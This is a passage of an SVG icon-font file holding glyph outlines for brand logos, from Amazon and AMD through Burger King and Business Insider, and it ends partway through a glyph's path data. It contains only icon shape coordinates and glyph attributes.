<glyph glyph-name="brand-amazon" horiz-adv-x="1000" unicode="&#xe8a1;" d="M592 571c-25-2-53-4-80-8-43-5-86-13-121-30-69-28-116-87-116-175 0-110 71-166 160-166 30 0 54 4 76 9 36 12 66 32 101 69 20-28 26-41 61-70 10-4 19-4 26 2 23 18 62 52 82 70 10 8 8 19 2 28-20 26-41 49-41 99v168c0 71 6 136-46 184-43 40-110 55-162 55h-22c-95-6-196-47-218-165-4-14 7-20 15-22l104-13c11 2 16 11 18 21 10 41 43 61 80 65h8c22 0 46-10 59-28 15-22 13-52 13-78l1-15z m0-109c0-42 1-76-21-113-13-26-35-43-60-49-3 0-9-2-14-2-41 0-66 32-66 79 0 59 36 88 80 101 25 5 53 7 80 7l1-23z m342-523c46 38 65 108 66 145v6c0 8-2 14-4 17-9 11-76 22-133 4-17-5-31-12-44-21-10-7-8-16 2-15 11 2 25 3 42 5 35 3 76 4 87-9 14-17-17-93-30-125-4-10 5-14 14-7z m-929 145c130-119 302-190 495-190 119 0 256 34 363 98 14 8 28 17 41 27 18 13 2 34-16 25l-26-10c-116-45-238-67-351-67-180 0-354 50-495 132-13 7-22-6-11-15z" />
<glyph glyph-name="brand-amd" horiz-adv-x="1000" unicode="&#xe8a2;" d="M1000 849v-990c-10 10-19 19-28 28l-5 5c-79 80-159 160-238 239-4 4-5 7-5 12 0 142 0 284 0 426v9h-9c-143 0-285 0-427 0-6 0-10 2-15 6-37 38-75 76-114 114-48 48-97 96-145 144-2 2-4 4-7 7h993z m-719-321c1-134 2-267 3-401h399c-3-3-4-4-6-6-88-88-176-177-265-265-3-4-7-5-12-5-130 0-261 0-392 0h-8v8c0 127 0 254 0 382 0 4 1 7 4 10 91 91 181 182 272 272 1 2 3 3 5 5z" />
<glyph glyph-name="brand-american-airlines" horiz-adv-x="1000" unicode="&#xe8a3;" d="M518 446c-170 213-251 322-277 346-24 23-48 46-105 46h-136l204-335c29-45 53-58 129-58h185v1z m169-101c45 0 65-7 65-7-14 47-47 91-184 91-84 0-166-8-206-27-35-19-44-31-44-52 0-19 4-36 15-55l102-167s-7 20-7 42c0 105 115 175 259 175z m-65-27c-41-8-78-23-106-45-41-33-64-78-59-144 0-6 3-24 6-39 3-6 3-6 3-11l81-136c35-56 93-81 164-81h289l-338 409-40 47z" />
<glyph glyph-name="brand-android-robot" horiz-adv-x="1000" unicode="&#xe8a4;" d="M500 515h270c8 0 8 0 8-7v-392c0-38-29-68-67-69-13-1-26 0-39 0-7 0-7 0-7-7 0-43 0-85 0-127 0-32-24-59-56-63-31-3-60 18-67 50-1 4-1 9-1 14 0 42 0 84 0 126 0 7 0 7-6 7-24 0-48-1-71 0-5 0-6-2-6-6 0-43 0-86 0-129 0-25-15-48-38-57-24-10-51-4-68 14-12 12-17 26-17 43-1 43-1 86 0 129 0 4-2 6-6 6-16 0-32-1-49 0-32 4-58 33-58 65 0 39 0 77 0 115v281c0 7 0 7 7 7h271z m-1 21c-90 0-181 0-272 0-4 0-6 1-5 6 1 28 6 56 17 82 15 38 38 70 69 97 16 14 33 26 51 36 4 2 4 3 2 6-13 23-25 46-38 69l-2 4c-3 6-1 11 3 13 5 2 10 1 12-5l13-22c9-17 18-33 27-50 2-5 4-5 9-3 42 17 85 24 129 22 36-1 70-9 103-23 3-2 4 0 6 2 13 24 26 48 39 72 2 3 3 7 7 7 3 1 7 1 9-2 3-3 3-7 1-11-7-12-14-25-21-38-7-12-13-23-19-35-2-3-2-5 2-7 44-23 79-56 104-99 20-34 31-71 33-110 0-11 0-11-11-11-90 0-179 0-268 0z m-125 148c-14 0-24-11-24-24 0-13 11-23 23-23 13 0 24 10 24 23 0 13-11 24-23 24z m229-23c0-13 10-24 23-24 13 0 24 10 24 23 0 13-10 23-23 24-13 0-24-10-24-23z m-403-326v-128c0-31-22-57-51-62-32-4-61 14-70 44-2 7-2 13-2 20v254c0 31 18 55 47 62 39 10 76-20 76-59 0-44 0-87 0-131z m723 1c0-45 0-89 0-133-1-35-34-62-68-58-34 4-56 29-56 63v257c0 35 29 63 63 62 34-1 61-28 61-63 0-43 0-85 0-128h0z" />
<glyph glyph-name="brand-android" horiz-adv-x="1000" unicode="&#xe8a5;" d="M512 451c-4 4-10 2-14 1 0-26 0-52 0-78-7 8-14 16-23 21-18 12-42 15-63 10-20-4-38-18-49-35-13-21-16-48-7-71 6-14 15-27 27-36 19-15 45-20 68-14 19 5 35 17 47 32v-31c4-1 10-1 14 0 1 63 0 125 0 187 0 4 1 9 0 14z m-54-183c-17-9-36-7-53-1-20 10-36 30-38 52-5 32 18 65 50 72 15 3 32 2 45-6 18-9 31-27 34-47 5-28-11-59-38-70z m-151 124c-24 21-65 21-90 0-17-14-27-36-26-58 0-28 0-56 0-84 5-1 10-1 15 0 0 29-1 59 0 88 0 29 26 55 55 54 29 2 56-23 58-52 0-30 0-60 0-90 5-1 10-1 15 0v86c0 21-10 42-27 56z m-159 13c-1-10 0-21-1-31-8 10-18 19-30 25-15 8-34 10-51 7-26-4-49-22-59-46-7-14-8-30-6-44 4-26 21-49 44-61 16-7 35-10 53-7 20 4 37 17 49 33v-31c5-1 10-1 14 0 1 52 1 104 0 155-4 1-9 1-13 0z m-5-97c-7-21-25-38-45-44-18-5-39-1-54 9-23 15-34 46-26 72 6 23 26 41 49 46 18 4 37 0 52-11 22-16 33-46 24-72z m669 94c-5 1-12 3-16-1-1-49 0-98 0-147 0 0 2-2 3-2 4 1 13-2 13 4 0 49 0 97 0 146z m-10 49c-8-2-11-12-6-17 5-5 14-4 17 2 5 7-3 17-11 15z m184 0c-1-25 0-51-1-77-6 8-12 15-20 20-18 12-41 16-62 12-21-4-40-18-52-36-11-18-14-39-10-59 4-23 19-43 39-54 14-7 30-11 46-10 23 1 45 15 59 34 0-10 0-20 0-30 5-2 10-2 15-1v202c-5 1-10 3-14-1z m-13-161c-8-12-21-21-35-26-13-4-28-2-41 2-21 8-37 26-41 48-3 15-1 31 6 44 9 16 25 28 42 33 14 3 29 2 43-5 18-8 32-25 36-44 4-18 1-37-10-52z m-364 117c-37 3-70-31-71-67l0-90c5-1 10-2 14 1 1 22 0 43 1 65 0 15-2 31 5 45 8 15 22 27 38 30 5 1 9 0 13 3 1 4 0 9 0 13z m119-10c-17 10-38 12-57 9-21-4-40-18-52-37-10-17-14-38-10-57 4-20 16-39 33-51 16-11 36-16 55-14 29 3 54 23 65 49 7 15 7 31 5 46-4 23-19 44-39 55z m8-113c-8-10-20-16-32-20-19-5-41-1-56 12-14 10-22 26-25 42-5 33 18 66 50 73 16 3 32 1 46-7 20-10 33-31 34-54 1-17-5-34-17-46z" />
<glyph glyph-name="brand-aol" horiz-adv-x="1000" unicode="&#xe8a6;" d="M153 548l-153-388h103l21 56h134l19-56h105l-151 388h-78z m-2-253l41 135 40-135h-81z m394 166c-106 0-156-83-156-154s50-155 156-155c105 0 155 83 155 155s-50 154-155 154z m0-228c-38 0-70 31-70 74 0 42 32 73 70 73s69-31 69-73-32-74-69-74z m204 315v-388h88v386l-1 2z m193-274c-32 0-58-26-58-58 0-32 26-58 58-58 32 0 58 26 58 58 0 32-26 58-58 58z" />
<glyph glyph-name="brand-apple" horiz-adv-x="1000" unicode="&#xe8a7;" d="M551 774c36 43 97 74 147 76 6-59-17-117-52-160-35-42-92-75-148-70-7 57 21 117 53 154z m285-800c-41-61-84-121-152-123-67-1-88 40-165 40-76 0-100-38-163-41-65-2-115 66-157 127-86 124-151 350-63 503 43 76 121 125 206 126 64 1 125-44 164-44 40 0 113 54 191 46 32-1 124-13 182-99-5-3-109-64-107-190 1-152 132-202 133-203-1-3-21-71-69-142z" />
<glyph glyph-name="brand-appstore" horiz-adv-x="1000" unicode="&#xe8a8;" d="M0 248v136c0 13 10 23 23 23h240l-105-181h-135c-13 0-23 10-23 22z m171-277l-77-52c-10-7-17-3-16 10l10 88c2 13 12 18 23 12l59-34c11-7 11-18 1-24z m18 50l-59 33c-11 7-15 20-8 31l274 476c6 11 20 14 31 8l59-34c11-6 15-20 9-31l-275-475c-6-11-20-15-31-8z m209 205l104 181h60l85-181h-249z m340-54c-24 12-142 283-172 354s-122 259-92 274c21 10 96-138 153-227 56-89 175-319 189-345 15-26-14-48-29-55-16-6-25-13-49-1z m78-125l-36 56c-8 12-4 26 8 32l34 18c12 6 27 1 34-11l28-54c6-12 2-28-10-35l-24-14c-12-7-27-3-34 8z m131-147c-8 24-64 25-90 61-25 36-4 54 5 63 103 58 85-124 85-124z m53 348c0-12-10-22-23-22h-120c-1 7-3 14-7 20-3 6-11 21-22 42-16 30-38 73-63 119h212c13 0 23-10 23-23l0-136z" />
<glyph glyph-name="brand-asus" horiz-adv-x="1000" unicode="&#xe8a9;" d="M0 247h66l92 142-62 6-96-148z m492 207h-187c-26-2-37-14-45-22-9-9-14-29-14-29v51h-99c-8 0-15-3-20-11-6-7-28-44-28-44h393l0 55z m308 0c-25-2-36-14-45-22-9-9-14-29-14-29v-4h259v55h-200z m-298 0h55v-55h-55v55z m183 0h56v-55h-56v55z m1-135s0-19-18-19h-95s-16 1-16 18v73l-55 4v-79c0 1 0 2 0 2-2 9-17 45-52 48-20 2-201 16-201 16 3-18 11-27 17-32 12-12 32-16 32-16 5 0 140-11 140-11 5 0 13-1 13-12 0-1-2-10-12-10h-195v82l-55 3v-140h262c45 9 50 50 50 50 1 4 1 7 1 10v-9c9-47 52-50 52-50s4-1 5-1h127s55 5 55 56v77l-55 3 0-63z m261 47c-20 2-202 13-202 13 5-19 12-24 18-29 12-12 31-15 31-15 5-1 141-12 141-12 5 0 14-1 14-11 0-3-2-7-4-9 0 0-5-2-9-2h-195l0-55h200c50 3 57 50 57 50 2 12 1 22 1 22-2 12-18 45-52 48z" />
<glyph glyph-name="brand-ati" horiz-adv-x="1000" unicode="&#xe8aa;" d="M710 636h202c42 0 78-29 86-70 7-37-7-76-46-96-19-11-40-15-62-15-44 0-88 0-132 0-4 0-9 0-13-1-12-3-18-11-20-24 0-5-1-11-1-16 0-88 0-176 0-264 0-41-32-78-73-83-45-6-87 24-95 68-1 5-2 11-2 17 0 85 1 170 0 256 0 10-2 19-4 29-1 4-3 7-5 10-6 11-17 13-28 8-11-4-18-13-26-20-35-35-70-70-105-104-51-51-101-102-152-152l-90-90c-13-13-27-22-46-25-14-2-28 0-41 7-27 13-45 33-54 63-8 27-1 52 16 73 11 14 24 26 37 39 29 29 58 58 88 88 52 52 104 104 157 156 35 35 70 69 106 103 15 15 32 28 52 35 18 6 36 8 54 8 66 0 131 0 197 0z m131-89c0-36 29-66 65-66 34 0 66 27 66 66 0 36-30 66-66 66s-65-30-65-66z m149-298v-97c0-40-26-73-64-83-47-12-95 19-103 67-1 6-2 12-2 18 0 64 0 128 0 192 0 17 5 34 15 48 14 21 33 33 58 36 44 6 83-21 93-64 2-6 2-13 3-19 0-33 0-65 0-98z m-470 8c1-37-29-70-69-70-39 1-70 31-70 70 0 42 34 70 70 69 39 0 69-31 69-69z" />
<glyph glyph-name="brand-att" horiz-adv-x="1000" unicode="&#xe8ab;" d="M204 728c3-50 136-89 296-85 160 4 283 50 283 100 0 14-11 27-30 38-74 44-161 69-253 69-96 0-186-27-263-75-22-14-34-30-33-47z m143-248c53-6 192-25 300-16 218 18 266 94 266 143 0 14-7 33-14 45-20 26-42 49-65 71 6-7 8-16 8-21 2-34-53-79-164-116-70-23-162-45-276-45-192 0-258 73-258 119 0 4-1 43 44 80-41-32-77-71-105-115-4-5-5-11-5-18 0-46 113-107 269-127z m-163-334c108-45 279-78 377-75 352 13 429 190 438 242 0 12 1 25 1 37 0 41-5 81-14 119 4-17 5-33 5-41 0-17 3-171-348-249-210-47-299-45-444 0-126 40-195 133-197 212-1-13-2-27-2-41 0-11 0-23 1-34 9-66 96-135 183-170z m295-245c-76 0-242 13-350 114 92-101 224-165 371-165 192 0 358 108 442 266-26-45-141-215-463-215z m11 101c-64-7-430-24-483 267 7-46 21-90 40-132 23-41 81-98 163-132 430-178 695 34 746 139 20 45 34 94 40 145-6-39-46-236-506-287z m-471 483c8 29 18 57 31 83-6-14-9-29-9-50 0-122 263-242 586-154 126 34 314 100 314 202 0 5 2 16-15 45 21-34 38-71 51-109 6-21 5-35 5-40 0-25-31-177-334-204-26-3-219-6-386 37-111 28-223 82-244 158-3 11-2 22 1 32z" />
<glyph glyph-name="brand-audi" horiz-adv-x="1000" unicode="&#xe8ac;" d="M999 372c-13 125-155 192-261 130-7-4-15-7-23-11-2 1-5 2-7 4-53 36-121 40-177 12-10-5-19-10-28-16-4-1-7 1-11 4-53 35-117 40-173 14-11-5-22-11-33-18-3-1-6 0-9 3-30 21-63 31-96 32-15 0-30-2-45-5-21-5-40-14-58-26-59-38-84-96-77-167 13-124 155-192 261-129 8 3 15 7 23 10 3 0 5-2 8-3 52-37 120-41 176-12 10 4 19 10 28 16 4 0 7-1 11-4 53-36 118-40 173-14 11 5 22 11 33 18 3 0 6-1 9-3 30-21 64-31 96-32 15-1 30 1 46 5 20 5 40 14 57 26 59 37 84 95 77 166z m-251-130c48 73 48 145 0 217 2 2 5 4 7 5 7 5 13 8 20 11 39 15 94 13 135-23 57-48 64-131 16-188-15-18-34-32-56-40-41-14-89-9-122 18z m-279-1c-14-10-30-17-47-21-37-8-80 0-107 23 50 66 47 152 0 216 16 12 35 20 55 23 35 5 73-3 99-24-49-73-49-145 0-217 0 0 0 0 0 0z m-185 186c32-42 33-110 1-152-33 36-36 110-1 152z m215 0c34-38 35-107 2-153-34 37-34 106-2 153z m32-184c49 72 49 144 0 216l1 0c13 11 29 18 46 22 37 7 81 0 107-23-49-67-47-152 0-216-16-13-35-20-55-24-34-5-73 4-99 25z m184 183c34-36 36-110 1-152-32 41-33 110-1 152z m-470-190c-7-4-13-8-20-10-39-16-93-13-135 22-56 48-64 132-16 189 15 18 35 31 56 39 41 14 89 9 122-18-48-73-48-144 0-216-2-2-5-4-7-6z" />
<glyph glyph-name="brand-axiata" horiz-adv-x="1000" unicode="&#xe8ad;" d="M153 850l694-397v-402l-347-201-347 202 347 197-347 204v397z" />
<glyph glyph-name="brand-bada" horiz-adv-x="1000" unicode="&#xe8ae;" d="M7 406c35-255 343-399 513-378 223 27 467 272 424 533 90-130 62-381-61-533-135-167-378-225-585-138-195 81-317 296-291 516z m139 291c182 203 519 204 695 5 80-92 99-196 59-310-28-77-75-140-137-203 129 274-92 508-323 549-102 18-200 10-294-41z m148-576c-117 58-214 135-238 275-26 155 84 296 241 305 47 3 94 0 141-1-83-12-147-59-196-121-25-33-50-65-63-106-37-115 12-232 88-322 9-10 18-20 27-30z m-35 40s-219 292 96 513l-65 11-182-165 85-315 66-44z" />
<glyph glyph-name="brand-bbc" horiz-adv-x="1000" unicode="&#xe8af;" d="M690 499v-298h310v298h-310z m242-230c-22-12-47-18-75-18-23 0-42 4-59 13-15 10-28 23-38 38-9 18-14 35-14 53 0 31 11 56 33 76 21 20 47 31 78 31 23 0 47-6 73-17l-1-32c-24 14-47 21-70 21-24 0-43-7-59-23-15-14-24-33-24-56 0-21 8-40 24-55 16-15 35-22 59-22 25 0 49 8 73 23v-32z m-586-68h309v298h-309v-298z m95 253h53c18 0 31-2 40-6 10-5 17-12 22-19 5-8 7-17 7-28 0-20-10-35-31-43 15-3 27-9 36-19 8-9 12-21 13-34 0-10-3-20-8-28-6-8-13-15-24-20-11-5-23-8-39-8h-69v205z m82-79c6 7 10 15 10 24 0 20-13 30-38 30h-25v-62h19c16 0 27 3 34 8z m23-84c3 5 5 10 5 16-1 6-2 12-6 17-3 6-8 10-15 12-7 3-18 5-33 4h-27v-65h29c14 0 25 1 32 3 7 4 12 8 15 13z m-546-90h310v298h-310v-298z m94 253h54c18 0 30-2 40-6s17-12 22-20c5-7 7-16 8-27-1-20-11-34-32-44 16-2 27-8 36-18 9-9 13-21 13-34 0-11-2-20-8-28-5-9-13-15-23-20-11-5-24-8-40-8h-70v205z m83-79c6 6 10 15 10 24 0 19-13 30-38 30h-25v-62h20c15 0 26 3 33 8z m23-85c3 5 4 11 5 17-1 7-3 13-6 17-4 6-9 10-15 12-7 3-19 4-33 4h-27v-65h29c15 0 26 1 33 3 6 3 10 7 14 12z" />
<glyph glyph-name="brand-bing" horiz-adv-x="1000" unicode="&#xe8b0;" d="M498 380l155-79-537-280 3 6 210 187-1 565-217 67-6 3-4-838 226-159 573 338v244l-494 149z" />
<glyph glyph-name="brand-blackberry" horiz-adv-x="1000" unicode="&#xe8b1;" d="M48 529c12 57 24 113 37 173 57-2 114-1 170-6 32-2 58-20 65-55 8-34-6-69-35-89-23-16-49-23-76-23-53-1-106 0-161 0z m-11-91c57 0 112 2 167-1 38-2 63-26 69-57 7-36-7-73-40-90-22-11-47-20-71-21-53-3-107-1-162-1 12 57 25 114 37 170z m317-169c13 57 25 114 38 173 57-1 114-1 170-6 32-2 57-20 65-54 8-34-6-70-35-90-24-17-53-23-82-24-50-2-100-1-150-1-1 0-3 1-6 2z m48 260c12 57 24 113 37 171 10 0 20 1 30 0 46-1 93 0 140-4 32-2 58-19 66-54 8-35-7-70-37-91-22-15-48-22-74-22-53-1-106 0-162 0z m-98-530c12 56 24 112 37 171 11 0 23 0 34 0 38 0 75-1 113-1 9 0 19-2 28-4 29-7 53-21 60-53 7-33-2-63-28-86-19-16-43-26-68-27-58-2-116 0-176 0z m421 376c11 47 21 94 31 142 6 29 7 29 36 29 39 0 77 0 116-1 9 0 18-1 28-3 31-7 56-22 62-57 7-34-3-65-32-84-19-13-42-23-64-25-58-3-116-1-177-1z m-51-272c9 43 18 86 28 128 3 14 3 34 12 42 9 7 29 3 43 2 39 0 77 0 116-2 47-4 77-35 76-75-1-36-17-64-51-79-17-8-37-15-56-15-55-2-110-1-168-1z" />
<glyph glyph-name="brand-bmw" horiz-adv-x="1000" unicode="&#xe8b2;" d="M0 372c2 16 3 31 5 47 5 43 17 84 34 124 28 67 68 125 122 174 61 57 132 96 213 117 33 9 66 14 100 16 1 0 3 0 4 0h45c10-1 20-2 30-3 44-4 86-14 127-30 72-28 134-70 186-126 63-68 104-147 124-238 6-30 9-60 10-91 0-1 0-3 1-5v-14c-1-14-2-28-3-42-4-38-12-75-24-111-24-70-61-131-112-185-70-74-156-122-256-144-32-7-64-10-96-11-124-2-235 37-331 117-76 63-129 143-158 239-11 37-18 76-20 115 0 2-1 4-1 6v45z m500-505c266 0 481 215 483 479 2 272-218 487-482 487-268 0-483-216-484-483 0-264 214-483 483-483z m-463 483c0 256 208 465 467 463 254-2 463-210 459-471-4-251-211-459-471-455-250 4-455 208-455 463z m463 296c-162 0-292-130-296-289-3-168 131-303 296-303 163 0 296 132 296 296 0 165-134 296-296 296z m0-296c2 0 4 0 7 0h270c-1-67-22-127-65-178-55-65-126-97-212-99v270c0 3 0 5 0 7l0 0z m0 0c-2 0-4 0-6 0h-270c-4 149 127 281 276 276v-271c0-1 0-3 0-5l0 0z" />
<glyph glyph-name="brand-box" horiz-adv-x="1000" unicode="&#xe8b3;" d="M537 463c-74 0-139-42-171-103-33 61-97 103-172 103-43 0-84-14-116-39v164c-1 21-18 38-39 38s-38-17-39-38v-322h0c2-106 88-191 194-191 75 0 139 42 172 103 32-61 97-103 171-103 108 0 194 87 194 194 1 107-86 194-194 194z m-343-310c-64 0-116 52-116 116 0 64 52 117 116 117 65 0 117-53 117-117 0-64-52-116-117-116z m343 0c-64 0-116 52-116 116 0 64 52 117 116 117 65 0 117-53 117-117 0-64-52-116-117-116z m456-17l-100 133 100 133c12 17 8 41-8 53s-41 10-54-7l-86-114-86 114c-13 17-37 20-54 7s-20-36-8-53l99-133-99-133c-12-17-9-41 8-54s41-9 54 7l86 115 86-115c13-16 37-20 53-7s21 37 9 54z" />
<glyph glyph-name="brand-burger-king" horiz-adv-x="1000" unicode="&#xe8b4;" d="M346 755c-122-66-140-174-140-174-1-2-2-10 1-14 3-3 7-3 12-2 43 15 171 57 251 79 115 30 210 49 270 59 5 1 9 2 10 6 2 6-2 12-2 12s-38 63-169 77c-70 7-166-7-233-43z m162-819c-126-2-238 41-318 116l-48-20 0 75c-53 71-84 161-84 264 0 263 201 470 482 470 46 0 87-8 118-15-48 16-96 24-149 24-301 0-504-244-504-496 0-274 216-504 498-504 270 0 416 190 462 305l-84 45c-69-154-200-262-373-264z m301 567c-38-7-114-40-114-144 0-84 61-111 116-104 40 4 67 20 82 35 14 13 17 32 17 46 1 20 0 84 0 84l-104-23v-25c0-16 8-25 25-21 5 0 13 3 13 3l0-20c0 1 2-11-25-16-34-6-50 15-50 53 0 40 23 64 51 70 31 7 48 0 59-2 34-5 44 47 13 59-24 9-54 11-83 5z m-194-92v-74s-42 53-69 80c-15 15-39 6-39 6l-36-11 0-247s32 11 35 12c26 9 35 24 35 51 0 29 0 85 0 85l74-86c12-12 28-13 42-9 14 4 26 17 26 36 0 62 0 214 0 214s-19-4-35-9c-18-5-33-17-33-48z m-245-281s21 7 40 14c28 11 38 25 38 54 0 25 0 209 0 209s-22-7-41-14c-23-8-37-22-37-58 0-33 0-205 0-205z m-84-8c13-14 36-21 57-4 19 15 16 42 6 53l-54 54s48 75 55 87c11 17 5 37-13 46-21 9-39-1-46-13l-64-108 0 87-75-31 0-246 53 22s10 3 16 13c6 9 6 24 6 24l0 78 59-62z m304-112c201 48 243 190 248 210 1 4 2 11-2 15-3 3-8 3-14 2-139-33-371-104-505-161-5-3-8-4-10-8-3-6 4-12 4-12 27-35 148-78 279-46z m-360 466c0 25-23 42-61 28-14-5-56-22-56-22l0-179 67 28c32 13 57 32 56 66 0 18-14 31-29 34 16 13 23 27 23 45z m-71-8c15 8 25 5 25-9 0-11-7-20-17-25-2-1-5-2-8-4l0 38z m10-104c-4-2-10-5-10-5v44c18 9 29 2 29-12 1-13-8-22-19-27z m135 12c34 10 57 30 58 79l0 94c0 15-11 19-23 15-10-3-22-7-22-7l0-112c0-11-2-25-16-28-10-3-15 4-15 15l0 91c0 16-11 20-24 16-14-5-22-8-22-8s0-79 0-111c0-37 25-55 64-44z m440 272c0 6 0 19 0 19-24-4-69-13-97-20l0-163s53 12 83 19c10 2 16 9 16 21v19l-54-12 0 32s26 5 34 7c9 2 14 7 14 17 0 10 0 19 0 19l-48-10v25s25 5 38 8c11 2 14 9 14 19z m-252-90c1 27-24 43-58 35-22-5-60-18-60-18l0-168s18 6 27 9c10 4 18 12 18 24 0 13 0 44 0 44l39-40c13-13 28-7 34-1 10 9 10 25 1 34l-29 27c13 11 28 27 28 54z m-73-49v47c9 3 26 7 27-11 0-22-27-36-27-36z m381 26c0 12 0 40 0 40l37-45c7-7 19-11 31-4 13 8 13 24 5 33-7 7-29 33-29 33 12 8 27 22 27 46 0 26-22 45-56 41-12-2-59-10-59-10l0-161 24 4c13 3 20 12 20 23z m25 96c1-21-25-31-25-31l-1 43c9 2 26 5 26-12z m-243-39c10 2 19 1 26 0 17-3 27 6 27 20 1 15-13 25-42 24-63-2-95-48-95-102 0-55 36-79 80-71 25 5 37 13 46 20 9 8 12 19 12 29v63l-67-15s0-7 0-19c0-8 6-14 15-12 6 1 10 2 10 2l0-18c0-8-11-13-22-12-16 0-25 13-26 36 1 31 16 50 36 55z m368-321c-24 0-45-17-45-43 0-27 21-44 45-44s45 17 45 44c0 26-21 43-45 43z m0-78c-18 0-33 15-33 35 0 20 15 34 33 34 18 0 33-14 33-34 0-20-15-35-33-35z m20 45c0 10-7 14-19 14h-18v-49h0 9v21h6l12-21h10l-13 21c8 1 13 5 13 14z m-28-6v13h8c5 0 10-1 10-6 0-6-4-7-9-7h-9z" />
<glyph glyph-name="brand-business-insider" horiz-adv-x="1000" unicode="&#xe8b5;" d="M35 386c4 0 10 0 17-1 6 0 12 0 15 0 40 0 59 24 59 48 0 25-22 41-40 47 12 9 22 20 22 38 0 12-7 33-47 33-7 0-16-1-26-1-5 0-19 1-30 1-4 0-5 0-5-2s1-2 4-2c3 0 6 0 8-1 7-1 9-5 10-12 0-7 0-13 0-47v-38c0-20 0-38-1-47-1-6-2-11-7-12-2 0-4-1-7-1-3 0-4 0-4-2 0-1 2-2 4-2 5 0 11 1 16 1 5 0 10 0 12 0z m64 37c0-23-17-28-27-28-5 0-10 0-16 2-7 3-8 7-8 21v52c0 1 1 2 2 2 3 0 5 0 9-1 9 0 14-2 18-5 17-11 22-30 22-43z m-51 115c0 2 1 3 2 4 3 0 5 0 8 0 18 0 27-19 27-34 0-11-3-19-9-23-4-3-8-4-16-4-5 0-8 0-10 0-1 1-2 1-2 3v54z m240-12c-7 0-20 0-22 0 0 0-13 0-23 0-3 0-4 0-4-1 0-2 1-2 3-2 2 0 6-1 7-1 6-2 8-4 8-10 0-6 1-11 1-40v-23c0-19-1-35-12-45-7-8-17-10-25-10-7 0-16 0-25 7-9 8-14 18-14 45v26c0 29 0 34 0 40 0 6 2 9 7 10 2 0 4 1 6 1 2 0 3 0 3 2s-1 1-4 1c-7 0-20 0-25 0-6 0-19 0-29 0-3 0-4 0-4-1 0-2 1-2 3-2 3 0 6-1 7-1 7-2 8-4 9-10 0-6 0-11 0-40v-27c0-27 8-41 17-49 14-13 34-13 44-13 13 0 28 2 41 13 16 14 19 36 19 57v19c0 29 0 34 0 40 0 6 2 9 7 10 2 0 3 1 6 1s3 0 3 2c0 1-1 1-4 1z m54-143c10 0 23 1 32 8 14 10 19 21 19 35 0 16-8 31-33 45l-8 4c-17 10-21 16-21 25 0 12 13 19 27 19 12 0 18-5 21-8 4-5 5-11 5-13 0-2 1-3 2-3 2 0 3 2 3 6 0 15 0 20 0 22 0 2-1 2-2 3-5 1-15 3-28 3-26 0-48-15-48-38 0-16 7-29 30-42l11-7c17-10 19-18 19-26 0-13-10-24-26-24-12 0-27 5-31 19-1 3-2 7-2 9 0 2 0 3-2 3-1 0-2-2-2-4-1-3-1-15-1-25 0-4 0-5 3-7 9-3 20-4 32-4z m127 2c2 0 4 1 4 2 0 1-1 2-3 2-3 0-8 1-10 1-6 1-7 4-8 9-1 8-1 23-1 41v33c0 28 0 33 1 39 0 7 2 9 7 10 2 0 3 1 5 1s4 0 4 2c0 1-2 1-4 1-8 0-20 0-25 0-6 0-19 0-26 0-3 0-5 0-5-1 0-2 2-2 4-2 2 0 4 0 7-1 4-1 6-4 6-10 0-6 0-11 0-39v-33c0-18 0-33-1-41 0-5-1-8-5-9-2 0-4-1-7-1-2 0-3-1-3-2 0-1 1-2 4-2 7 0 20 1 25 1 5 0 18-1 31-1z m68 2c0 2-1 2-3 2-3 0-7 1-10 2-4 1-6 5-7 20l-2 76h1c4-3 24-26 45-46 20-20 44-43 56-54 2-2 5-4 8-4 2 0 3 2 3 6l2 118c1 10 2 13 7 15 3 1 4 1 6 1 3 0 4 1 4 2 0 1-2 1-5 1-9 0-16 0-19 0-4 0-14 0-24 0-3 0-5 0-5-1 0-1 1-2 3-2 3 0 7 0 10-1 5-2 7-5 7-17l2-83h-1c-3 3-28 29-42 42-28 28-57 57-59 60-3 3-6 6-8 6-2 0-4-3-4-7l-1-110c-1-16-1-21-6-23-3 0-6-1-9-1-2 0-3-1-3-2 0-1 2-2 4-2 10 0 19 1 21 1 4 0 13-1 25-1 3 0 4 1 4 2z m223 3c1 4 3 16 3 20 0 2 0 5-2 5-1 0-2-1-2-3-2-8-4-12-9-14-5-2-13-2-18-2-19 0-25 3-26 15 0 6 0 22 0 28v15c0 1 0 2 1 2 5 0 27 0 30-1 8-1 10-3 11-7 1-3 1-5 1-7 0-1 0-1 2-1 1 0 2 2 2 4 0 1 0 9 1 12 1 10 1 13 1 14 0 1-1 2-1 2-1 0-2-1-4-3-1-2-4-2-9-2-4-1-29-1-33-1-2 0-2 1-2 2v46c0 1 1 2 2 2 3 0 26 0 30-1 9-1 11-3 12-7 2-2 2-5 2-6 0-2 0-3 1-3 2 0 2 2 2 3 1 2 1 11 2 13 0 8 1 10 1 12 0 0 0 1-1 1-1 0-2 0-3-1-2 0-5 0-8-1-4 0-47 0-53 0-6 0-18 1-28 1-3 0-4-1-4-2 0-1 1-2 3-2 3 0 6 0 8-1 6-2 8-3 8-10 0-6 0-11 0-39v-33c0-17 0-32-1-40 0-5-1-9-5-10-2 0-4 0-7 0-3 0-3-2-3-2 0-2 1-2 3-2 4 0 9 0 14 0 4 0 9 0 11 0 6 0 13 0 22 0 10-1 21-1 36-1 7 0 9 0 10 5z m110 36c0 16-8 31-34 45l-7 4c-18 10-21 16-21 25 0 12 13 19 26 19 13 0 19-5 22-8 4-5 5-11 5-13 0-2 1-3 2-3 1 0 2 2 2 6 0 15 1 20 1 22 0 2-1 2-3 3-5 1-14 3-27 3-27 0-49-15-49-38 0-16 8-29 31-42l11-7c17-10 19-18 19-26 0-13-10-24-27-24-12 0-26 5-30 19-2 3-2 7-2 9 0 2 0 3-2 3-2 0-3-2-3-4 0-3-1-15-1-25 0-4 1-5 4-7 8-3 20-4 31-4 11 0 23 1 32 7 14 11 20 22 20 36z m26-38c8-4 20-5 31-5 11 0 23 1 32 8 14 10 20 21 20 35 0 16-8 31-34 45l-7 4c-18 10-21 16-21 25 0 12 13 19 26 19 13 0 19-5 22-8 4-5 5-11 5-13 0-2 1-3 2-3 1 0 2 2 2 6 0 15 1 20 1 22 0 2-1 2-3 3-5 1-14 3-27 3-27 0-49-15-49-38 0-16 8-29 31-42l11-7c17-10 19-18 19-26 0-13-10-24-27-24-12 0-26 5-30 19-2 3-2 7-2 9 0 2 0 3-2 3-2 0-3-2-3-4 0-3-1-15-1-25 0-4 1-5 4-6z m-817-233c-3 0-8 1-11 1-7 1-8 5-9 11-1 9-1 27-1 48v39c0 33 0 39 1 46 0 8 2 11 8 12 2 1 4 1 6 1 3 0 4 1 4 2 0 2-2 2-5 2-8 0-21-1-26-1-7 0-21 1-29 1-3 